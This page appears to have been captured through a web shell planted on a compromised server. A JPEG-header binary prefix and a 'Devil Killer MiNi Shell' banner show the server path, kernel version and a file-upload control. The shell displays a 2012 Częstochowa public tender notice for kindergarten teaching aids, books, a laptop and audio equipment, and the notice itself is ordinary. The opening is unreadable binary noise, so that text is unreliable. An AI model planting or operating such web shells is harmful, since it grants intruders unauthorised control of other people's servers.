JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120206/35218-N-2012.html

<p class="kh_header"><b>Częstochowa: Zakup i dostawa pomocy dydaktycznych, podręczników/książek, programów multimedialnych, sprzętu komputerowego, sprzętu RTV/muzycznego, tablicy multimedialnej, materiałów papierniczo - biurowych, materiałów eksploatacyjnych, na zajęcia w Miejskim Przedszkolu nr 22 im. Marii Montessorii w Częstochowie w ramach projektu pn. Razem poznajemy świat</b><br>
<b>Numer ogłoszenia: 35218 - 2012; data zamieszczenia: 06.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. (034) 3707100, faks 034 3707175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa pomocy dydaktycznych, podręczników/książek, programów multimedialnych, sprzętu komputerowego, sprzętu RTV/muzycznego, tablicy multimedialnej, materiałów papierniczo - biurowych, materiałów eksploatacyjnych, na zajęcia w Miejskim Przedszkolu nr 22 im. Marii Montessorii w Częstochowie w ramach projektu pn. Razem poznajemy świat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa pomocy dydaktycznych, podręczników/książek, programów multimedialnych, sprzętu komputerowego, sprzętu RTV/muzycznego, tablicy multimedialnej, materiałów papierniczo - biurowych, materiałów eksploatacyjnych, na zajęcia w Miejskim Przedszkolu nr 22 im. Marii Montessorii w Częstochowie w ramach projektu pn. Razem poznajemy świat. Zamówienie podzielone jest na 8 części:
Część nr 1 Zakup i dostawa pomocy dydaktycznych. 
Część nr 2 Zakup i dostawa podręczników/książek. 
Część nr 3 Zakup i dostawa programów multimedialnych. 
Część nr 4 Zakup i dostawa sprzętu komputerowego. 
Część nr 5 Zakup i dostawa sprzętu RTV/muzycznego. 
Część nr 6 Zakup i dostawa tablicy multimedialnej.
Część nr 7 Zakup i dostawa materiałów papierniczo - biurowych.
Część nr 8 Zakup i dostawa materiałów eksploatacyjnych.

Zamawiający dopuszcza składanie ofert równoważnych, tzn. produktów o innych nazwach niż podane w opisie poszczególnych części, jednak o parametrach technicznych nie gorszych niż posiadają produkty wymienione w tych częściach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 37.00.00.00-8, 37.50.00.00-3, 22.11.10.00-1, 22.10.00.00-1, 22.11.40.00-2, 48.50.00.00-3, 30.21.31.00-6, 32.30.00.00-6, 32.34.00.00-8, 32.32.00.00-2, 32.32.12.00-1, 30.19.00.00-7, 30.19.97.00-7, 30.12.51.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania tj. zakończenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 2 usług odpowiadających przedmiotowi niniejszego zamówienia, tj. dostawy pomocy dydaktycznych lub podręczników/książek lub programów multimedialnych lub sprzętu komputerowego lub sprzętu RTV/muzycznego lub materiałów papierniczo - biurowych lub materiałów eksploatacyjnych. Wykaz ma zawierać: przedmiot, jego wartość, daty wykonania i nazwy odbiorców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony druk OFERTA, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, stanowiący załącznik nr 2 do specyfikacji.
2. Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. Wobec Wykonawcy, będącego osobą fizyczną i prowadzącego działalność gospodarczą zaleca się dołączenie od oferty aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej (oryginału lub potwierdzonej za zgodność kserokopii).
3. W przypadku wykonawców wspólnie ubiegających się o zamówienie oraz w przypadku, gdy wykonawca wykazując spełnianie warunków, o których mowa w punkcie 6.2  SIWZ polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie tych warunków,  dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dokumentów go dotyczących) lub przez pełnomocnika konsorcjum jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu, podpisanego przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Edukacji Urząd Miasta Częstochowa, ul. Śląska 11/13, 42-217 Częstochowa, Karolina Borecka pok. nr 34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 09:00, miejsce: Biurze Obsługi Interesanta /parter/, stanowisko Wydziału Nadzoru i Administracji w siedzibie Zamawiającego. Otwarcie ofert: 14.02.2012 r. godz. 09:30 sala nr 108 w siedzibie Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Komplet menzurek(7 menzurek do odmierzania cieczy o pojemności od 10 do 1000 ml) - 8 kpl.
2 Klepsydra piaskowa - 1 szt.
3 Wskaźnik wagowy od 0 do 1000 - 1 szt.
4 Komplet odważników w pudełku (10 odważników o wadze od 1 do 50 g) -1 kpl.
5 Waga szalkowa - 1 szt.
6 Model szkieletu człowieka	- 1 szt.
7 Model tułowiu człowieka	- 1 szt.
8 Komplet demonstracyjny pokazujący powstawanie kryształu - 1 kpl.
9 Komplet demonstracyjny pokazujący wybuch wulkanu	- 1 kpl.
10 Zegar słoneczny - 1 szt.
11 Komplet dużych kulek magnetycznych - 1 kpl.
12 Komplet magnetycznych obręczy	- 1 kpl.
13 Komplet mały elektryk, zestaw do prezentacji obwodu elektrycznego - 1 kpl.
14 Pojemnik z opiłkami magnetycznymi	-1 szt.
15 Podstawa magnetyczna do eksperymentów - 1 szt.
16 Duża lupa - 16 szt.
18 Pojemnik ze szkłem powiększającym - 8 szt.
19 Mikroskop z wyświetlaczem - 1 szt.
20 Mikroskop - 15 szt.
21 Komplet preparatów mikroskopowych - 5 kpl.
22 Komplet preparatów mikroskopowych (ok. 5 szkiełek z różnymi preparatami - 3 kpl.
23 Komplet preparatów mikroskopowych- zoologia - 3 kpl.
24 Wiatrometr - 1 szt.
25 Komplet odkrywcy - 15 szt.
26 Miarki	- 1 kpl.
27 Komplet konstrukcyjny do zabaw konstrukcyjnych i do nauki geometrii - 1 kpl.
28 Warsztat mieszania kolorów - 5 kpl.
29 Komplet barwników uzupełniających - 10 kpl.
30 Komplet tabliczek dotykowych o zmiennej fakturze - 1 kpl.
31 Komplet tabliczek dotykowych o zmiennej fakturze  - 1 kpl.
32 Komplet tabliczek barycznych o różnym ciężarze - 1 kpl.
33 Komplet tabliczek termicznych o różnej temperaturze - 1 kpl.
34 Komplet zapachowych butelek - 1 kpl.
35 Komplet magnesów - 2 kpl.
36 Układ słoneczny	 - 1 kpl.
37 Makiety planet układu słonecznego - 1 szt.
38 Komplet pokazujący obieg wody w przyrodzie - 1 kpl.
39 Komplet elementów do budowy prostych maszyn - 1 kpl.
40 Zegar magnetyczny - 1 szt.
41 Stempel - tarcza zegarowa do zaznaczania godzin - 1 szt.
42 Igła magnetyczna - 5 szt.
43 Model ucha - 1 szt.
44 Model jamy ustnej - 1 szt.
45 Model zęba - 1 szt.
46 Model oka - 1 szt.
47 Duża taca drewniana - 1 szt.
48 Komplet małych tac drewnianych (2 sztuki) - 1 kpl.
49 Komplet składający się z drewnianej tacy i dwóch miseczek) - 3 kpl.
50 Komplet złotych koralików	 - 2 kpl.
51 Komplet złotych pręcików	Ok.45 sztuk pręcików  - 1 kpl.
52 Komplet drewnianych karty z liczbami 1-9000 - 1 kpl.
53 Komplet drewnianych kwadratów - 3 kpl.
54 Komplet drewnianych sześcianów - 1 kpl.
55 Duże liczydło - 1 szt.
56 Pudełko z zadaniami na dodawanie w zakresie 18 - 1 szt.
57 Pudełko z zadaniami na odejmowanie w zakresie 18 - 1 szt.
58 Tablica setkowa - 1 szt.
59 Tablica z cyframi od 11 do 19 - 1 szt.
60 Tablica z cyframi od 11 do 99 - 1 szt.
61 Pudełko z koralikami do tablicy z cyframi od 11 do 19 - 1 szt.
62 Pudełko z koralikami do tablicy z cyframi od 11 do 99 - 1 szt.
63 Komplet wprowadzający do systemu dziesiętnego - 1 kpl.
64 Komplet wrzecion matematycznych	 - 10 kpl.
65 Pudełko na wrzeciona - 1 szt.
66 Komplet małych kart z liczbami od 1 do 3000 (ok. 30 sztuk) - 3 kpl.
67 Komplet małych kart z liczbami od 1 do 9000 (ok. 36 sztuk) - 1 kpl.
68 Komplet dużych kart z liczbami od 1 do 9000 (ok. 36 sztuk) - 1 kpl.
69 Komplet dużych kart z liczbami od 1 do 1000 (ok. 28 sztuk) - 1 kpl.
70 Pudełko na małe karty liczbowe - 4 szt.
71 Pudełko na duże karty liczbowe - 2 szt.
72 Komplet kolorowych tabliczek (ok. 32 par tabliczek w różnych kolorach) - 1 kpl.
73 Komplet dużych pionków - liczmany - 1 kpl.
74 Komplet liczykropek  - 4 kpl.
75 Taca do sortowania liczmanów - 1 szt.
76 Komplet sześcianów - 1 kpl.
77 Komplet prostopadłościanów - 1 kpl.
78 Trójkąt wpisany w koło - 1 szt.
79 Komplet brył objętościowych - 1 kpl.
80 Komplet składanych brył geometrycznych (ok. 11 brył)	 - 1 kpl.
81 Gry dydaktyczne do nauki języka angielskiego - 4 szt.
82 Stojak na pacynki - 4 szt.
83 Stojak wielofunkcyjny (konstrukcja do wykonania sceny teatralnej) - 1 szt.
84 Komplet akcesoriów do wykonania teatrzyku (np. kotara, materiały dekoracyjne  w m bieżących) - 1 kpl.
85 Pacynka - 62 szt.
86 Trójkąt (instrument muzyczny) - 11 szt.
87 Marakasy drewniane - 11  kpl.
88 Grzechotka w tubie - 11 szt.
89. Kastaniety - 11 szt.
90 Dzwonki (cymbałki) - 22 szt.
91 Talerze z miedzi (2 sztuki) - 6 kpl.
92 Dzwoneczki z uchwytami (2 sztuki)	 - 11 kpl.
93 Bębenek - 11 szt.
94 Tamburyn - 11 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.00-9, 37.00.00.00-8, 37.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa podręczników/książek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Podręcznik do nauki języka angielskiego - 44 szt.
2. Piosenki (CD i książka) do nauki języka angielskiego - 2 szt.
3. Bajkowy słownik języka angielskiego - 1 szt.
4. Ilustrowany słownik języka angielskiego - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.10.00-1, 22.10.00.00-1, 22.11.40.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa programów multimedialnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Program komputerowy do nauki języka angielskiego - 1 szt.
2 Program komputerowy do nauki języka angielskiego - 1 szt.
3 Słownik multimedialny języka angielskiego - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa sprzętu komputerowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Laptop z oprogramowaniem - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa sprzętu RTV/muzycznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 sprzęt nagłaśniający - głośnik - 1 szt.
2 sprzęt nagłaśniający - wzmacniacz
3 nadajnik - mikrofon - 1 szt.
4 pokrowiec - 1 szt.
5 statyw kolumnowy - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6, 32.34.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa tablicy multimedialnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tablica multimedialna - 1 szt.</p></li>
